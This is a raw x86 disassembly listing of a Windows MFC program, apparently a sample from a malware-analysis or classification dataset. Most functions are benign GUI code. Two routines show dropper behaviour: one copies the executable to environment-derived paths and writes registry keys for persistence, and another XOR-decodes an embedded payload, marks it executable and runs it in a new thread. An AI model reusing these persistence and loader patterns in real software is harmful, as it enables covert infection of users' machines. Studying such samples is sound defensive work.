sub_401000
push 0xffffffff
push sub_402d3a
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
push ecx
push 0xc8
call Ordinal_MFC42_823
add esp 0x4
mov [ esp ] eax
test eax eax
mov [ esp + 0xc ] 0x0
je r-xdata
mov ecx [ esp + 0x4 ]
xor eax eax
mov [ fs : 0x0 ] ecx
add esp 0x10
retn
mov ecx eax
call sub_4010a0
mov ecx [ esp + 0x4 ]
mov [ fs : 0x0 ] ecx
add esp 0x10
retn
sub_4012a0
push 0xffffffff
push sub_402d6c
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x28
push ebx
push esi
push edi
mov esi ecx
push rw-data
call Ordinal_MFC42_6117
push 0x4
mov ecx esi
call Ordinal_MFC42_4159
push 0x90
call Ordinal_MFC42_823
add esp 0x4
mov [ esp + 0xc ] eax
test eax eax
mov [ esp + 0x3c ] 0x0
je r-xdata
xor eax eax
push r--data
push r--data
push r--data
push 0x81
mov ecx eax
call Ordinal_MFC42_411
jmp r-xdata
xor edi edi
mov ecx eax
call sub_401180
mov edi eax
jmp r-xdata
or ebx 0xffffffff
push eax
mov ecx esi
mov [ esp + 0x40 ] ebx
call Ordinal_MFC42_986
push 0xc4
call Ordinal_MFC42_823
add esp 0x4
mov [ esp + 0xc ] eax
test eax eax
mov [ esp + 0x3c ] 0x1
je r-xdata
push 0x1
mov ecx edi
mov [ esi + 0x20 ] edi
call Ordinal_MFC42_2558
mov ecx esi
call Ordinal_MFC42_2635
push 0x1
mov ecx esi
call Ordinal_MFC42_5503
lea ecx [ esp + 0x10 ]
call Ordinal_MFC42_296
lea ecx [ esp + 0x10 ]
mov [ esp + 0x3c ] 0x2
push ecx
mov ecx esi
call Ordinal_MFC42_5214
lea edx [ esp + 0x10 ]
mov ecx esi
push edx
call Ordinal_MFC42_5301
test eax eax
jne r-xdata
pop edi
pop esi
pop ebx
mov ecx [ esp + 0x28 ]
mov [ fs : 0x0 ] ecx
add esp 0x34
retn
mov eax [ edi ]
push 0x0
push 0x0
push 0xcf8000
push 0x80
mov ecx edi
mov [ esp + 0x4c ] ebx
call [ eax + 0xc0 ]
test eax eax
jne r-xdata
mov eax [ esi + 0x78 ]
mov ecx edi
push eax
call Ordinal_MFC42_6215
mov ecx [ edi + 0x20 ]
push ecx
call [ UpdateWindow@IAT ]
lea ecx [ esp + 0x10 ]
mov [ esp + 0x3c ] ebx
call Ordinal_MFC42_617
mov ecx [ esp + 0x34 ]
pop edi
pop esi
mov eax 0x1
pop ebx
mov [ fs : 0x0 ] ecx
add esp 0x34
retn
lea ecx [ esp + 0x10 ]
mov [ esp + 0x3c ] ebx
call Ordinal_MFC42_617
pop edi
pop esi
xor eax eax
pop ebx
mov ecx [ esp + 0x28 ]
mov [ fs : 0x0 ] ecx
add esp 0x34
retn
sub_4014a0
push 0xffffffff
push sub_402d88
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x60
lea ecx [ esp ]
call sub_401420
lea ecx [ esp ]
mov [ esp + 0x68 ] 0x0
call Ordinal_MFC42_2514
lea ecx [ esp ]
mov [ esp + 0x68 ] 0xffffffff
call Ordinal_MFC42_641
mov ecx [ esp + 0x60 ]
mov [ fs : 0x0 ] ecx
add esp 0x6c
retn
sub_401520
push 0xffffffff
push sub_402daa
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
push ecx
push 0x98
call Ordinal_MFC42_823
add esp 0x4
mov [ esp ] eax
test eax eax
mov [ esp + 0xc ] 0x0
je r-xdata
mov ecx [ esp + 0x4 ]
xor eax eax
mov [ fs : 0x0 ] ecx
add esp 0x10
retn
mov ecx eax
call sub_4015c0
mov ecx [ esp + 0x4 ]
mov [ fs : 0x0 ] ecx
add esp 0x10
retn
sub_401610
push esi
mov esi ecx
call Ordinal_MFC42_4823
test eax eax
jne r-xdata
push edi
lea edi [ esi + 0x58 ]
mov ecx 0x10
mov eax 0xffffff
[ edi ]
mov [ esi + 0x54 ] 0xff
pop edi
mov eax 0x1
pop esi
retn
pop esi
retn
sub_401640
push ecx
push ebx
push ebp
push esi
mov esi [ esp + 0x14 ]
push edi
mov edi ecx
mov eax [ esi + 0x14 ]
mov [ esp + 0x10 ] edi
not eax
test al 0x1
je r-xdata
mov ebp 0x4
add edi 0x58
mov [ esp + 0x18 ] ebp
add edi 0x58
mov [ esp + 0x18 ] 0x4
mov eax [ esi + 0x24 ]
mov ecx [ eax ]
mov [ edi ] ecx
mov eax [ esi + 0x24 ]
add eax ebp
add edi ebp
dec ebx
mov [ esi + 0x24 ] eax
jne r-xdata
sub eax ecx
mov ecx esi
add eax ebp
push eax
call Ordinal_MFC42_2740
mov edx [ esi + 0x24 ]
add edi 0x4
mov [ edx ] ebx
mov ebx [ esi + 0x24 ]
add ebx 0x4
dec ebp
mov [ esi + 0x24 ] ebx
mov eax ebx
jne r-xdata
mov ecx esi
call Ordinal_MFC42_2801
mov eax [ esi + 0x24 ]
mov ecx [ esi + 0x28 ]
lea edx [ eax + 0x4 ]
cmp edx ecx
jbe r-xdata
mov ecx [ esp + 0x18 ]
dec ecx
mov [ esp + 0x18 ] ecx
jne r-xdata
mov ecx [ esi + 0x24 ]
mov eax [ esi + 0x28 ]
mov ebx [ edi ]
add ecx 0x4
cmp ecx eax
jbe r-xdata
mov ecx [ esp + 0x18 ]
dec ecx
mov [ esp + 0x18 ] ecx
jne r-xdata
mov ebx ebp
mov ecx [ esi + 0x28 ]
add eax 0x4
cmp eax ecx
jbe r-xdata
mov ebp 0x4
mov ecx [ esp + 0x10 ]
add eax 0x4
mov edi [ ecx + 0x54 ]
mov ecx [ esi + 0x28 ]
cmp eax ecx
jbe r-xdata
mov eax [ esi + 0x24 ]
mov edx [ esp + 0x10 ]
pop edi
mov ecx [ eax ]
mov [ edx + 0x54 ] ecx
mov eax [ esi + 0x24 ]
add eax ebp
mov [ esi + 0x24 ] eax
pop esi
pop ebp
pop ebx
pop ecx
retn 0x4
mov edx [ esi + 0x24 ]
sub edx ecx
mov ecx esi
add edx ebp
push edx
call Ordinal_MFC42_2740
mov edx [ esi + 0x24 ]
mov [ edx ] edi
mov eax [ esi + 0x24 ]
add eax 0x4
pop edi
mov [ esi + 0x24 ] eax
pop esi
pop ebp
pop ebx
pop ecx
retn 0x4
mov ecx esi
call Ordinal_MFC42_2801
sub_401780
mov eax [ esp + 0x8 ]
push esi
mov esi ecx
push 0x1
mov ecx [ esp + 0xc ]
lea edx [ eax + ecx * 4 ]
mov eax [ esp + 0x14 ]
mov ecx esi
mov [ esi + edx * 4 + 0x58 ] eax
mov edx [ esi ]
call [ edx + 0x64 ]
push 0x0
push 0x0
push 0x0
mov ecx esi
call Ordinal_MFC42_6329
pop esi
retn 0xc
sub_401810
mov eax ecx
push ebx
mov ecx [ esp + 0x8 ]
push esi
mov esi [ eax + 0x54 ]
xor ebx ebx
mov edx [ ecx ]
cmp esi 0xff
sete bl
push ebx
call [ edx + 0x8 ]
pop esi
pop ebx
retn 0x4
sub_401840
mov eax ecx
push ebx
mov ecx [ esp + 0x8 ]
push esi
mov esi [ eax + 0x54 ]
xor ebx ebx
mov edx [ ecx ]
cmp esi 0xffff
sete bl
push ebx
call [ edx + 0x8 ]
pop esi
pop ebx
retn 0x4
sub_401870
mov eax ecx
push ebx
mov ecx [ esp + 0x8 ]
push esi
mov esi [ eax + 0x54 ]
xor ebx ebx
mov edx [ ecx ]
cmp esi 0xff00
sete bl
push ebx
call [ edx + 0x8 ]
pop esi
pop ebx
retn 0x4
sub_4018a0
mov eax ecx
push ebx
mov ecx [ esp + 0x8 ]
push esi
mov esi [ eax + 0x54 ]
xor ebx ebx
mov edx [ ecx ]
cmp esi 0xffff00
sete bl
push ebx
call [ edx + 0x8 ]
pop esi
pop ebx
retn 0x4
sub_4018d0
mov eax ecx
push ebx
mov ecx [ esp + 0x8 ]
push esi
mov esi [ eax + 0x54 ]
xor ebx ebx
mov edx [ ecx ]
cmp esi 0xff0000
sete bl
push ebx
call [ edx + 0x8 ]
pop esi
pop ebx
retn 0x4
sub_401900
mov eax ecx
push ebx
mov ecx [ esp + 0x8 ]
push esi
mov esi [ eax + 0x54 ]
xor ebx ebx
mov edx [ ecx ]
cmp esi 0xffffff
sete bl
push ebx
call [ edx + 0x8 ]
pop esi
pop ebx
retn 0x4
sub_401950
push 0xffffffff
push sub_402dca
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
push ecx
push 0x44
call Ordinal_MFC42_823
add esp 0x4
mov [ esp ] eax
test eax eax
mov [ esp + 0xc ] 0x0
je r-xdata
mov ecx [ esp + 0x4 ]
xor eax eax
mov [ fs : 0x0 ] ecx
add esp 0x10
retn
mov ecx eax
call sub_4019f0
sub_4019f0
push 0xffffffff
push sub_402df6
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x738
push esi
mov esi ecx
mov [ esp + 0x4 ] esi
call Ordinal_MFC42_560
lea ecx [ esp + 0x8 ]
mov [ esp + 0x744 ] 0x0
mov [ esi ] r--data
call sub_402170
lea ecx [ esp + 0x8 ]
mov [ esp + 0x744 ] 0x1
call sub_402260
sub_401ab0
push 0xffffffff
push sub_402e08
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x24
mov eax [ ecx + 0x40 ]
push ebx
mov ebx [ esp + 0x38 ]
push ebp
push esi
push edi
mov edx [ ebx ]
push 0x4
mov ecx ebx
mov [ esp + 0x14 ] eax
call [ edx + 0x3c ]
mov [ esp + 0x44 ] 0x0
mov ebp 0xffffffdd
mov eax [ esp + 0x44 ]
mov ecx [ esp + 0x10 ]
push edi
push eax
call sub_401760
push eax
lea ecx [ esp + 0x20 ]
call Ordinal_MFC42_283
mov edx [ esp + 0x20 ]
lea eax [ ebp - 0x46 ]
mov [ esp + 0x30 ] eax
lea eax [ esp + 0x1c ]
neg eax
sbb eax eax
lea ecx [ esi + 0x46 ]
and eax edx
lea edx [ esp + 0x24 ]
push eax
mov eax [ ebx + 0x4 ]
push edx
push eax
mov [ esp + 0x30 ] esi
mov [ esp + 0x34 ] ebp
mov [ esp + 0x38 ] ecx
call [ FillRect@IAT ]
mov [ esp + 0x1c ] r--data
lea ecx [ esp + 0x1c ]
mov [ esp + 0x3c ] 0x0
call Ordinal_MFC42_2414
add esi 0x46
inc edi
cmp esi 0x13b
mov [ esp + 0x3c ] 0xffffffff
mov [ esp + 0x1c ] r--data
jl r-xdata
mov edx [ esp + 0x44 ]
sub ebp 0x46
inc edx
cmp ebp 0xfffffec5
mov [ esp + 0x44 ] edx
jg r-xdata
lea eax [ ebp - 0x46 ]
xor edi edi
mov [ esp + 0x14 ] eax
mov esi 0x23
mov esi 0x23
push 0xffffffdd
lea ecx [ esp + 0x20 ]
push esi
push ecx
mov ecx ebx
call Ordinal_MFC42_4297
push 0xfffffec5
push esi
mov ecx ebx
call Ordinal_MFC42_4133
add esi 0x46
cmp esi 0x13b
jle r-xdata
mov esi 0xffffffdd
push esi
lea edx [ esp + 0x18 ]
push 0x23
push edx
mov ecx ebx
call Ordinal_MFC42_4297
push esi
push 0x13b
mov ecx ebx
call Ordinal_MFC42_4133
sub esi 0x46
cmp esi 0xfffffec5
jge r-xdata
mov ecx [ esp + 0x34 ]
pop edi
pop esi
pop ebp
pop ebx
mov [ fs : 0x0 ] ecx
add esp 0x30
retn 0x4
sub_401c10
push 0xffffffff
push sub_402e28
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x1c
push ebx
push esi
mov esi ecx
call Ordinal_MFC42_2379
push esi
lea ecx [ esp + 0x14 ]
call Ordinal_MFC42_289
push 0x4
lea ecx [ esp + 0x14 ]
mov [ esp + 0x30 ] 0x0
call Ordinal_MFC42_6021
mov eax [ esp + 0x38 ]
mov ecx [ esp + 0x3c ]
mov [ esp + 0x8 ] eax
mov eax [ esp + 0x18 ]
lea edx [ esp + 0x8 ]
push 0x1
push edx
push eax
mov [ esp + 0x18 ] ecx
call [ DPtoLP@IAT ]
mov ebx [ esp + 0x8 ]
cmp ebx 0x23
jl r-xdata
lea ecx [ esp + 0x10 ]
mov [ esp + 0x2c ] 0xffffffff
call Ordinal_MFC42_613
mov ecx [ esp + 0x24 ]
pop esi
pop ebx
mov [ fs : 0x0 ] ecx
add esp 0x28
retn 0xc
cmp ebx 0x13b
jg r-xdata
mov eax [ esp + 0xc ]
cmp eax 0xffffffdd
jg r-xdata
cmp eax 0xfffffec5
jl r-xdata
mov ecx 0xffffffdd
push edi
sub ecx eax
mov eax 0xea0ea0eb
imul ecx
add edx ecx
mov eax 0xea0ea0eb
sar edx 0x6
mov ecx edx
mov esi [ esi + 0x40 ]
shr ecx 0x1f
add edx ecx
lea ecx [ ebx - 0x23 ]
mov edi edx
imul ecx
add edx ecx
mov ecx esi
sar edx 0x6
mov eax edx
shr eax 0x1f
add edx eax
mov ebx edx
call sub_401750
push eax
push ebx
push edi
mov ecx esi
call sub_401780
pop edi
sub_401d50
push 0xffffffff
push sub_402e48
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
push ecx
push esi
mov esi ecx
mov [ esp + 0x4 ] esi
mov [ esi ] r--data
mov [ esp + 0x10 ] 0x0
call Ordinal_MFC42_2414
mov ecx [ esp + 0x8 ]
mov [ esi ] r--data
pop esi
mov [ fs : 0x0 ] ecx
add esp 0x10
retn
sub_401e00
mov eax [ esp + 0x8 ]
push esi
mov esi ecx
push edi
mov edi [ lstrcpynA@IAT ]
push 0x104
lea ecx [ esi + 0x104 ]
push eax
push ecx
call edi
mov edx [ esp + 0xc ]
push 0x104
push edx
push esi
call edi
pop edi
mov eax 0x1
pop esi
retn 0x8
sub_401e40
push 0xffffffff
push sub_402ea2
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x11c
push ebx
push ebp
push esi
push edi
mov edi ecx
xor ebp ebp
lea ecx [ esp + 0x18 ]
mov [ esp + 0x14 ] ebp
call Ordinal_MFC42_540
lea ecx [ esp + 0x1c ]
mov [ esp + 0x134 ] ebp
call Ordinal_MFC42_540
mov esi [ getenv@IAT ]
push rw-data
mov [ esp + 0x138 ] 0x1
call esi
add esp 0x4
lea ecx [ esp + 0x18 ]
push eax
call Ordinal_MFC42_860
lea eax [ esp + 0x18 ]
push rw-data
lea ecx [ esp + 0x24 ]
push eax
push ecx
call Ordinal_MFC42_924
push edi
lea edx [ esp + 0x14 ]
mov bl 0x2
push eax
push edx
mov [ esp + 0x140 ] bl
call Ordinal_MFC42_924
push eax
lea ecx [ esp + 0x1c ]
mov [ esp + 0x138 ] 0x3
call Ordinal_MFC42_858
lea ecx [ esp + 0x10 ]
mov [ esp + 0x134 ] bl
call Ordinal_MFC42_800
lea ecx [ esp + 0x20 ]
mov [ esp + 0x134 ] 0x1
call Ordinal_MFC42_800
push rw-data
call esi
add esp 0x4
lea ecx [ esp + 0x1c ]
push eax
call Ordinal_MFC42_860
lea eax [ esp + 0x1c ]
push rw-data
lea ecx [ esp + 0x28 ]
push eax
push ecx
call Ordinal_MFC42_924
push edi
lea edx [ esp + 0x24 ]
mov bl 0x4
push eax
push edx
mov [ esp + 0x140 ] bl
call Ordinal_MFC42_924
push eax
lea ecx [ esp + 0x20 ]
mov [ esp + 0x138 ] 0x5
call Ordinal_MFC42_858
lea ecx [ esp + 0x20 ]
mov [ esp + 0x134 ] bl
call Ordinal_MFC42_800
lea ecx [ esp + 0x24 ]
mov [ esp + 0x134 ] 0x1
call Ordinal_MFC42_800
lea eax [ esp + 0x28 ]
push 0x104
push eax
push ebp
call [ GetModuleFileNameA@IAT ]
mov ecx [ esp + 0x18 ]
mov ebx [ CopyFileA@IAT ]
push ebp
lea edx [ esp + 0x2c ]
push ecx
push edx
call ebx
cmp eax 0x1
jne r-xdata
mov ecx [ esp + 0x1c ]
push ebp
lea edx [ esp + 0x2c ]
push ecx
push edx
call ebx
cmp eax 0x1
lea esi [ edi + 0x104 ]
jne r-xdata
mov eax [ esp + 0x18 ]
lea esi [ edi + 0x104 ]
push eax
push esi
call [ sprintf@IAT ]
add esp 0x8
jmp r-xdata
push ebp
lea ecx [ esp + 0x2c ]
push esi
push ecx
call ebx
mov eax [ esp + 0x1c ]
push eax
push esi
call [ sprintf@IAT ]
add esp 0x8
jmp r-xdata
mov ebx [ RegCreateKeyA@IAT ]
lea edx [ esp + 0x14 ]
push edx
push rw-data
push 0x80000002
call ebx
cmp eax ebp
jne r-xdata
lea edx [ esp + 0x14 ]
push edx
push rw-data
push 0x80000001
call ebx
cmp eax ebp
mov [ esp + 0x10 ] ebp
jne r-xdata
mov ebx [ RegSetValueExA@IAT ]
mov [ esp + 0x10 ] ebp
mov ebp [ lstrlenA@IAT ]
mov edx [ esp + 0x14 ]
push edx
call [ RegCloseKey@IAT ]
lea ecx [ esp + 0x1c ]
mov [ esp + 0x134 ] 0x0
call Ordinal_MFC42_800
lea ecx [ esp + 0x18 ]
mov [ esp + 0x134 ] 0xffffffff
call Ordinal_MFC42_800
mov ecx [ esp + 0x12c ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
mov [ fs : 0x0 ] ecx
add esp 0x128
retn
mov ebx [ lstrlenA@IAT ]
mov ebp [ RegSetValueExA@IAT ]
test eax eax
je r-xdata
push edi
call ebp
test eax eax
push esi
jg r-xdata
push edi
call ebx
test eax eax
push esi
jg r-xdata
lea edx [ esp + 0x14 ]
push edx
push rw-data
push 0x80000001
call [ RegCreateKeyA@IAT ]
test eax eax
mov [ esp + 0x10 ] 0x0
jne r-xdata
call ebp
mov ecx [ esp + 0x14 ]
push eax
push esi
push 0x1
push 0x0
push edi
push ecx
call ebp
push eax
mov eax [ esp + 0x18 ]
push esi
push 0x1
push 0x0
push 0x0
push eax
jmp r-xdata
call ebx
mov ecx [ esp + 0x14 ]
push eax
push esi
push 0x1
push 0x0
push edi
push ecx
call ebx
push eax
mov eax [ esp + 0x18 ]
push esi
push 0x1
push 0x0
push 0x0
push eax
jmp r-xdata
cmp [ esp + 0x10 ] 0xa
jge r-xdata
cmp [ esp + 0x10 ] 0xa
jge r-xdata
jmp r-xdata
call ebx
mov edx [ esp + 0x10 ]
inc edx
test eax eax
mov [ esp + 0x10 ] edx
je r-xdata
cmp [ esp + 0x10 ] 0xa
jge r-xdata
call ebp
mov edx [ esp + 0x10 ]
inc edx
test eax eax
mov [ esp + 0x10 ] edx
je r-xdata
push edi
call ebp
test eax eax
push esi
jg r-xdata
call ebp
mov ecx [ esp + 0x14 ]
push eax
push esi
push 0x1
push 0x0
push edi
push ecx
call ebp
push eax
mov eax [ esp + 0x18 ]
push esi
push 0x1
push 0x0
push 0x0
push eax
jmp r-xdata
jmp r-xdata
call ebx
mov edx [ esp + 0x10 ]
inc edx
test eax eax
mov [ esp + 0x10 ] edx
je r-xdata
sub_402170
push 0xffffffff
push sub_402ec0
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0xc
push ebx
push ebp
push esi
mov esi ecx
xor ebx ebx
push edi
lea ecx [ esp + 0x10 ]
mov [ esi + 0x4 ] 0x1
mov [ esi + 0x110 ] 0x1
mov [ esi + 0x320 ] ebx
mov [ esi + 0x114 ] ebx
mov [ esi ] ebx
call Ordinal_MFC42_540
push rw-data
mov [ esp + 0x28 ] ebx
call [ getenv@IAT ]
add esp 0x4
lea ecx [ esp + 0x10 ]
push eax
call Ordinal_MFC42_860
mov ebp [ lstrcpyA@IAT ]
lea edi [ esi + 0x118 ]
push rw-data
push edi
call ebp
lea eax [ esp + 0x10 ]
push rw-data
lea ecx [ esp + 0x1c ]
push eax
push ecx
call Ordinal_MFC42_924
push edi
lea edx [ esp + 0x18 ]
push eax
push edx
mov [ esp + 0x30 ] 0x1
call Ordinal_MFC42_924
mov eax [ eax ]
push eax
lea eax [ esi + 0x21c ]
push eax
call ebp
lea ecx [ esp + 0x14 ]
call Ordinal_MFC42_800
lea ecx [ esp + 0x18 ]
mov [ esp + 0x24 ] bl
call Ordinal_MFC42_800
lea ecx [ esp + 0x10 ]
mov [ esp + 0x24 ] 0xffffffff
call Ordinal_MFC42_800
mov ecx [ esp + 0x1c ]
mov eax esi
pop edi
pop esi
pop ebp
pop ebx
mov [ fs : 0x0 ] ecx
add esp 0x18
retn
sub_402260
push 0xffffffff
push sub_402edb
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x8
push ebx
push ebp
push esi
mov ebx ecx
push 0x730
call Ordinal_MFC42_823
add esp 0x4
mov [ esp + 0xc ] eax
xor ebp ebp
cmp eax ebp
mov [ esp + 0x1c ] ebp
je r-xdata
push edi
lea esi [ ebx + 0x4 ]
mov ecx 0x1cc
mov edi ebp
[ edi ] [ esi ]
mov eax [ ebx + 0x114 ]
mov [ esp + 0x20 ] 0xffffffff
test eax eax
pop edi
je r-xdata
mov ecx eax
call sub_402420
mov ebp eax
mov eax [ ebx + 0x320 ]
test eax eax
je r-xdata
lea eax [ ebx + 0x21c ]
lea ecx [ ebx + 0x118 ]
push eax
push ecx
mov ecx rw-data
call sub_401e00
mov ecx rw-data
call sub_401e40
push 0x0
push 0x1d140
push rw-data
mov ecx ebp
call sub_402440
push eax
call Ordinal_MFC42_823
add esp 0x4
mov esi eax
mov ecx ebp
push esi
push 0x1d140
push rw-data
call sub_402440
lea edx [ esp + 0x10 ]
push edx
push 0x40
push eax
push esi
call [ VirtualProtect@IAT ]
mov eax [ ebx ]
push 0x0
push 0x0
push eax
push r-xdata
push 0x0
push 0x0
call [ CreateThread@IAT ]
call esi
mov esi [ Sleep@IAT ]
push 0xffffffff
call esi
push 0x3e8
call esi
push 0x3e8
call esi
push 0x3e8
call esi
push 0x3e8
call esi
push 0x3e8
call esi
push 0x3e8
call esi
push 0x3e8
call esi
push 0x3e8
call esi
push 0x3e8
call esi
push 0x0
call [ exit@IAT ]
lea edx [ ebx + 0x630 ]
lea eax [ ebx + 0x52c ]
push edx
lea ecx [ ebx + 0x324 ]
push eax
push ecx
mov ecx rw-data
call sub_402560
mov ecx rw-data
call sub_4025e0
sub_402440
mov eax [ esp + 0x4 ]
mov edx ecx
push ebx
push ebp
mov ecx [ eax ]
push esi
mov [ edx + 0x108 ] ecx
mov ecx [ eax ]
mov esi [ eax + 0x4 ]
mov ebp ecx
push edi
add esi eax
lea edi [ edx + 0x1 ]
mov ebx eax
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
[ edi ] [ esi ]
mov edi [ eax + 0xc ]
mov ecx [ edx + 0x10c ]
mov ebx [ ebx + 0x8 ]
add eax edi
dec ecx
jne r-xdata
mov eax [ esp + 0x14 ]
pop edi
pop esi
pop ebp
pop ebx
retn 0xc
mov ecx [ esp + 0x1c ]
push ecx
push ebx
push eax
mov ecx edx
call sub_4024a0
pop edi
pop esi
pop ebp
pop ebx
retn 0xc
sub_4024a0
push esi
push edi
mov edi ecx
mov ecx [ esp + 0x14 ]
mov esi [ edi + 0x108 ]
test ecx ecx
jne r-xdata
mov edx [ esp + 0x10 ]
push ebx
xor ebx ebx
test edx edx
jbe r-xdata
mov eax [ esp + 0x10 ]
pop edi
add eax esi
pop esi
retn 0xc
pop ebx
pop edi
mov eax edx
pop esi
retn 0xc
push ebp
mov ebp [ esp + 0x14 ]
sub ebp ecx
lea eax [ edx - 0x14 ]
cmp ebx eax
jbe r-xdata
add ecx ebx
inc ebx
cmp ebx edx
jb r-xdata
push ecx
push rw-data
call [ printf@IAT ]
mov ecx [ esp + 0x24 ]
mov edx [ esp + 0x20 ]
add esp 0x8
mov dl [ edi + eax + 0x1 ]
xor dl [ ecx + ebp ]
inc eax
cmp eax esi
mov [ ecx ] dl
jb r-xdata
mov ecx [ esp + 0x1c ]
mov edx [ esp + 0x18 ]
xor eax eax
test esi esi
jbe r-xdata
pop ebp
sub_402560
mov eax [ esp + 0x4 ]
push esi
push edi
mov edi [ lstrcpynA@IAT ]
mov esi ecx
push 0x104
push eax
push esi
call edi
mov ecx [ esp + 0x10 ]
push 0x104
lea edx [ esi + 0x104 ]
push ecx
push edx
call edi
mov eax [ esp + 0x14 ]
push 0x104
lea ecx [ esi + 0x208 ]
push eax
push ecx
call edi
xor eax eax
mov ecx 0x1
mov [ esi + 0x314 ] eax
mov [ esi + 0x318 ] 0x10
mov [ esi + 0x31c ] ecx
mov [ esi + 0x320 ] ecx
mov [ esi + 0x324 ] eax
mov [ esi + 0x328 ] eax
mov [ esi + 0x32c ] eax
mov [ esi + 0x330 ] eax
pop edi
pop esi
retn 0xc
_start
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x68
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
xor ebx ebx
mov [ ebp - 0x4 ] ebx
push 0x2
call [ __set_app_type@IAT ]
pop ecx
or [ rw-data ] 0xffffffff
or [ rw-data ] 0xffffffff
call [ __p__fmode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
call [ __p__commode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
mov eax [ _adjust_fdiv@IAT ]
mov eax [ eax ]
mov [ rw-data ] eax
call sub_402cb3
cmp [ rw-data ] ebx
jne r-xdata
call sub_402c9e
push rw-data
push rw-data
call _initterm
mov eax [ rw-data ]
mov [ ebp - 0x6c ] eax
lea eax [ ebp - 0x6c ]
push eax
push [ rw-data ]
lea eax [ ebp - 0x64 ]
push eax
lea eax [ ebp - 0x70 ]
push eax
lea eax [ ebp - 0x60 ]
push eax
call [ __getmainargs@IAT ]
push rw-data
push rw-data
call _initterm
add esp 0x24
mov eax [ _acmdln@IAT ]
mov esi [ eax ]
mov [ ebp - 0x74 ] esi
cmp [ esi ] 0x22
jne r-xdata
push sub_402cb0
call [ __setusermatherr@IAT ]
pop ecx
cmp [ esi ] 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
mov al [ esi ]
cmp al bl
je r-xdata
mov al [ esi ]
cmp al bl
je r-xdata
inc esi
mov [ ebp - 0x74 ] esi
jmp r-xdata
cmp [ esi ] 0x22
jne r-xdata
cmp al 0x22
jne r-xdata
mov [ ebp - 0x30 ] ebx
lea eax [ ebp - 0x5c ]
push eax
call [ GetStartupInfoA@IAT ]
test [ ebp - 0x30 ] 0x1
je r-xdata
cmp al 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
push 0xa
pop eax
movzx eax [ ebp - 0x2c ]
jmp r-xdata
push eax
push esi
push ebx
push ebx
call [ GetModuleHandleA@IAT ]
push eax
call sub_402cc0
mov [ ebp - 0x68 ] eax
push eax
call [ exit@IAT ]
sub_402cd8
call Ordinal_MFC42_1168
mov ecx [ esp + 0x4 ]
mov edx [ esp + 0x8 ]
test ecx ecx
mov [ eax + 0x14 ] cl
mov [ eax + 0x1040 ] edx
jne r-xdata
push 0x1
pop eax
retn 0x8
push 0xfffffffd
call [ _setmbcp@IAT ]
pop ecx
sub_401060
mov eax [ Ordinal_MFC42_1858@IAT ]
retn
sub_401070
mov eax r--data
retn
sub_401080
mov eax [ Ordinal_MFC42_4245@IAT ]
retn
sub_401090
mov eax r--data
retn
sub_4010a0
push esi
mov esi ecx
call Ordinal_MFC42_401
mov [ esi ] r--data
mov eax esi
pop esi
retn
sub_4010c0
push esi
mov esi ecx
call sub_4010e0
test [ esp + 0x8 ] 0x1
je r-xdata
mov eax esi
pop esi
retn 0x4
push esi
call Ordinal_MFC42_825
add esp 0x4
sub_4010e0
mov [ ecx ] r--data
jmp Ordinal_MFC42_674
sub_4010f0
mov eax [ esp + 0x4 ]
push eax
call Ordinal_MFC42_5254
neg eax
sbb eax eax
neg eax
retn 0x4
sub_401110
retn 0x4
sub_401120
mov eax [ esp + 0x4 ]
push eax
call Ordinal_MFC42_825
pop ecx
retn 0x4
sub_401130
retn
sub_401140
mov eax [ Ordinal_MFC42_1859@IAT ]
retn
sub_401150
mov eax r--data
retn
sub_401160
mov eax [ Ordinal_MFC42_4246@IAT ]
retn
sub_401170
mov eax r--data
retn
sub_401180
push esi
mov esi ecx
call Ordinal_MFC42_402
mov [ esi ] r--data
mov eax esi
pop esi
retn
sub_4011a0
push esi
mov esi ecx
call sub_4011c0
test [ esp + 0x8 ] 0x1
je r-xdata
mov eax esi
pop esi
retn 0x4
push esi
call Ordinal_MFC42_825
add esp 0x4
sub_4011c0
mov [ ecx ] r--data
jmp Ordinal_MFC42_674
sub_4011d0
mov eax [ esp + 0x4 ]
push eax
call Ordinal_MFC42_5255
neg eax
sbb eax eax
neg eax
retn 0x4
sub_4011f0
mov eax [ Ordinal_MFC42_4274@IAT ]
retn
sub_401200
mov eax r--data
retn
sub_401210
push esi
mov esi ecx
push 0x0
call Ordinal_MFC42_561
mov [ esi ] r--data
mov eax esi
pop esi
retn
sub_401230
push esi
mov esi ecx
call sub_401250
test [ esp + 0x8 ] 0x1
je r-xdata
mov eax esi
pop esi
retn 0x4
push esi
call Ordinal_MFC42_825
add esp 0x4
sub_401250
jmp Ordinal_MFC42_815
sub_401260
call sub_401270
jmp sub_401280
sub_401270
mov ecx rw-data
jmp sub_401210
sub_401280
push sub_401290
call sub_402b1c
pop ecx
retn
sub_401290
mov ecx rw-data
jmp sub_401250
sub_401420
push esi
push 0x0
mov esi ecx
push 0x64
call Ordinal_MFC42_324
mov [ esi ] r--data
mov eax esi
pop esi
retn
sub_401440
push esi
mov esi ecx
call sub_401460
test [ esp + 0x8 ] 0x1
je r-xdata
mov eax esi
pop esi
retn 0x4
push esi
call Ordinal_MFC42_825
